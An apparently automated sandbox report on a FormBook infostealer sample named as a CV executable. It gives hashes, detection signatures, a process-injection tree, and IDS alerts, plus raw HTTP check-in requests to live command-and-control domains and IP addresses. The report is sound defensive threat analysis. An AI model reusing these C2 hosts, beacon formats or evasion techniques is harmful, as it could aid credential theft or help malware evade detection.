Windows Analysis Report
CV Lic H&S Olivetti Renzo.exe

Overview

General Information

Sample name: CV Lic H&S Olivetti Renzo.exe
Analysis ID: 1561737
MD5: 12a282dc358949660691fbff8bcdf461
SHA1: c425cd4b512501453ec8f08f98983e5e02c6c614
SHA256: 7ab6840afe0f8992a491db388b5225eea0ab7bad3a76be681e3344776070ce4d
Tags: exe, Formbook, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CV Lic H&S Olivetti Renzo.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 12A282DC358949660691FBFF8BCDF461)
    • svchost.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NObNfBLfyhvzeH.exe (PID: 2316 cmdline: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 3380 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • NObNfBLfyhvzeH.exe (PID: 2020 cmdline: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , CommandLine: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, NewProcessName: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, OriginalFileName: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 3380, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , ProcessId: 2020, ProcessName: NObNfBLfyhvzeH.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 5568, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 3148, ProcessName: svchost.exe
                Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 5568, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 3148, ProcessName: svchost.exe

                AV Detection

                Source: CV Lic H&S Olivetti Renzo.exe, ReversingLabs: Detection: 63%
                Source: CV Lic H&S Olivetti Renzo.exe, Virustotal: Detection: 50%
                Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: CV Lic H&S Olivetti Renzo.exe, Joe Sandbox ML: detected
                Source: CV Lic H&S Olivetti Renzo.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525085376.000000000049E000.00000002.00000001.01000000.00000005.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4524587511.000000000049E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_00106CA9 GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_001060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_001063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_0010EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_0010F56F FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_0010F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_00111B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_00111C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, Code function: 0_2_00111F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\winver.exe, Code function: 5_2_0036C740 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\winver.exe, Code function: 4x nop then xor eax, eax (5_2_00359E10)
                Source: C:\Windows\SysWOW64\winver.exe, Code function: 4x nop then mov ebx, 00000004h (5_2_043704E8)

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49819 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49775 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49828 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49836 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49897 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49852 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49868 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49891 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49813 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49875 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49912 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49858 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49948 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49927 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49942 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 194.58.112.174:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 203.161.43.228
                Source: Joe Sandbox View, ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox View, ASN Name: COGENT-174US
                Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00114EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00114EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Sun, 24 Nov 2024 07:20:17 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: close
                Source: global trafficHTTP traffic detected: GET /wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.prhmcjdz.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
